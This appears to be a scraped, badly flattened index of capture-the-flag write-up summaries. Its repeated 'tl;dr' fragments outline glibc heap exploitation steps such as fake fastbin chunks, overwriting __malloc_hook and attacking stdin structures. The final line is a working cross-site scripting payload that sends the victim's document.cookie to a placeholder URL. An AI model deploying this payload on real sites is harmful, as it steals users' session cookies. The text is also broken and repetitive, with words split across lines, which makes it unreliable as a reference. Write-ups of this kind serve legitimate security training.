tl;dr
- Overflow from
stdin
stucture tillmain_arena
. - Create fake
fastbin
chunks to get overlapping chunk and leak. - Overwrite
__malloc_hook
using fastbin attack.
tl;dr
stdin
stucture till main_arena
.fastbin
chunks to get overlapping chunk and leak.__malloc_hook
using fastbin attack.tl;dr
char
candle counter stored in the wax structure and trigger uaf.tl;dr
tl;dr
tl;dr
__GI__IO_file_jumps
.dfprintf
.tl;dr
tl;dr
tl;dr
mmap_threshold
with null and trim top chunk size._IO_buf_base
and brute force to get allocation on stdin.tl;dr
tl;dr
a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e